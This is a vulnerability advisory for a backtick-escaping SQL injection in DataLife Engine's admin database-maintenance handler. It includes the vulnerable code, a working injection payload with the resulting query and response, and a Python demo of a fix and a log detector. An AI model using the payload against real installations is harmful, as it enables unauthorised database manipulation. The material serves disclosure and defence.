Request 1:
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1

ta[]=dle_admin_logs&whattodo=optimize
Request 2:
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1

ta[]=dle_admin_logs&whattodo=repair
Source code:
Code:
if( $action == "dboption" AND is_array($_REQUEST['ta']) AND count( $_REQUEST['ta'] ) ) {
    $arr = $_REQUEST['ta'];
    reset( $arr );
    $tables = "";
    // Each user-supplied table name is escaped as a string literal but then
    // placed between backticks (identifier position); the backtick itself is untouched.
    foreach ($arr as $val ) {
        $tables .= ", `" . $db->safesql( $val ) . "`";
    }
    $tables = substr( $tables, 1 );
    if( $_REQUEST['whattodo'] == "optimize" ) {
        $row = $db->super_query("SHOW TABLE STATUS WHERE Name = '" . PREFIX . "_post'");
        $storage_engine = $row['Engine'];
        if ( strtolower($storage_engine) == "innodb" ) {
            $query = "ANALYZE TABLE ";
        } else $query = "OPTIMIZE TABLE ";
    } else {
        $query = "REPAIR TABLE ";
    }
    $query .= $tables;
    $db->query( "INSERT INTO " . USERPREFIX . "_admin_logs (name, date, ip, action, extras) values ('".$db->safesql($member_id['name'])."', '{$_TIME}', '{$_IP}', '23', '')" );
    if( $db->query( $query ) ) {
        msg( "success", $lang['db_ok'], $lang['db_ok_1'], "?mod=dboption" );
    } else {
        msg( "error", $lang['db_err'], $lang['db_err_1'], "?mod=dboption" );
    }
}
Problem:
Because the backtick (`) is not escaped, it is possible to break out of the SQL query. The safesql function does not escape backticks: it escapes a value for use inside a string literal, but here the value is placed between backticks, i.e. in identifier position. In MySQL a backtick inside a quoted identifier has to be written as two backticks, and safesql does not do that, so a single backtick in a submitted table name terminates the identifier and everything that follows it is parsed as SQL.
Code:
foreach ($arr as $val ) {
    $tables .= ", `" . $db->safesql( $val ) . "`";
}
Impact:
The query sent to the database can be manipulated. Example: with the request below, the ANALYZE TABLE statement (the branch taken because the _post table is InnoDB) is extended with an UPDATE HISTOGRAM clause.
Code:
ta[]=dle_admin_logs` UPDATE HISTOGRAM ON date;#&whattodo=optimize
Query received by the database, as recorded in the MySQL general log:
Code:
2024-05-15T15:16:28.523068Z 14805 Query ANALYZE TABLE `dle_admin_logs` UPDATE HISTOGRAM ON date;#`
Response from the database:
Code:
+-----------------------+-----------+----------+-------------------------------------------------+
| Table                 | Op        | Msg_type | Msg_text                                        |
+-----------------------+-----------+----------+-------------------------------------------------+
| dle_db.dle_admin_logs | histogram | status   | Histogram statistics created for column 'date'. |
+-----------------------+-----------+----------+-------------------------------------------------+
Such modification (in our case, breaking out of the backtick and appending further query clauses) can put the integrity of the system at risk. The rating below is low because the endpoint requires an authenticated administrator (PR:H) and the injected text is appended to a statement that already begins with ANALYZE, OPTIMIZE or REPAIR TABLE and is executed as a single query, so the attacker can only extend that statement rather than replace it with an arbitrary one.
CVSS: AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N (2.7) Low
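As an added example (not DLE's code and not part of the original report), the following Python rebuilds the dboption statement the way admin.php does, with a stand-in for $db->safesql() that is assumed to escape like mysqli_real_escape_string, shows the logged query emerge from the report's payload, and contrasts it with proper identifier quoting plus an allowlist taken from SHOW TABLES. It also adds a check over MySQL general-log lines that flags maintenance statements whose table list is not a plain list of quoted names. The KNOWN_TABLES set, the first log line and the regex shapes are constructed for the demo; only the second log line comes from the report.

```python
import re

# Stand-in for DLE's $db->safesql(): assumed here to behave like
# mysqli_real_escape_string, i.e. string-literal escaping only.
# The backtick is deliberately absent from this table, as on the real server.
_STRING_ESCAPES = {
    "\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
    "\n": "\\n", "\r": "\\r", "\x1a": "\\Z",
}

def safesql(value: str) -> str:
    return "".join(_STRING_ESCAPES.get(ch, ch) for ch in value)

def quote_identifier(name: str) -> str:
    """Proper MySQL identifier quoting: an embedded backtick is doubled."""
    return "`" + name.replace("`", "``") + "`"

def _statement(whattodo: str, engine: str) -> str:
    # Same branch as admin.php: InnoDB tables get ANALYZE instead of OPTIMIZE.
    if whattodo == "optimize":
        return "ANALYZE TABLE " if engine.lower() == "innodb" else "OPTIMIZE TABLE "
    return "REPAIR TABLE "

def vulnerable_query(ta: list[str], whattodo: str, engine: str = "InnoDB") -> str:
    """Original construction: safesql() output wrapped in backticks.
    (admin.php builds the list with a leading comma and substr(); joining
    with ', ' yields the same statement.)"""
    tables = ", ".join("`" + safesql(val) + "`" for val in ta)
    return _statement(whattodo, engine) + tables

# Constructed allowlist standing in for the result of SHOW TABLES.
KNOWN_TABLES = {"dle_admin_logs", "dle_post", "dle_users"}

def hardened_query(ta: list[str], whattodo: str, engine: str = "InnoDB") -> str:
    """Reject anything that is not an existing table, then quote as an identifier."""
    if whattodo not in ("optimize", "repair"):
        raise ValueError(f"unknown action: {whattodo!r}")
    quoted = []
    for val in ta:
        if val not in KNOWN_TABLES:
            raise ValueError(f"not an existing table: {val!r}")
        quoted.append(quote_identifier(val))
    return _statement(whattodo, engine) + ", ".join(quoted)

# Detection side: flag maintenance statements in the general log whose table
# list is not a plain `name`, `name` list (the regex shapes are assumptions).
_MAINT_RE = re.compile(r"\bQuery\s+(ANALYZE|OPTIMIZE|REPAIR) TABLE\s+(.*)$")
_CLEAN_LIST_RE = re.compile(r"`\w+`(\s*,\s*`\w+`)*\s*;?\s*")

def suspicious_maintenance_queries(log_lines: list[str]) -> list[str]:
    hits = []
    for line in log_lines:
        m = _MAINT_RE.search(line)
        if m and not _CLEAN_LIST_RE.fullmatch(m.group(2)):
            hits.append(line)
    return hits

# Payload from the report; first log line constructed, second taken from the report.
PAYLOAD = "dle_admin_logs` UPDATE HISTOGRAM ON date;#"
SAMPLE_LOG = [
    "2024-05-15T15:10:01.000000Z 14800 Query\tOPTIMIZE TABLE `dle_post`, `dle_users`",
    "2024-05-15T15:16:28.523068Z 14805 Query\tANALYZE TABLE `dle_admin_logs` UPDATE HISTOGRAM ON date;#`",
]

if __name__ == "__main__":
    print(vulnerable_query([PAYLOAD], "optimize"))
    print(suspicious_maintenance_queries(SAMPLE_LOG))
    try:
        hardened_query([PAYLOAD], "optimize")
    except ValueError as exc:
        print("rejected:", exc)
```

With quote_identifier alone the payload becomes one (non-existent) identifier, `dle_admin_logs`` UPDATE HISTOGRAM ON date;#`, and MySQL simply reports an unknown table; the allowlist check rejects it before any statement is built, which is the stronger fix because the only legitimate inputs are names the server itself listed.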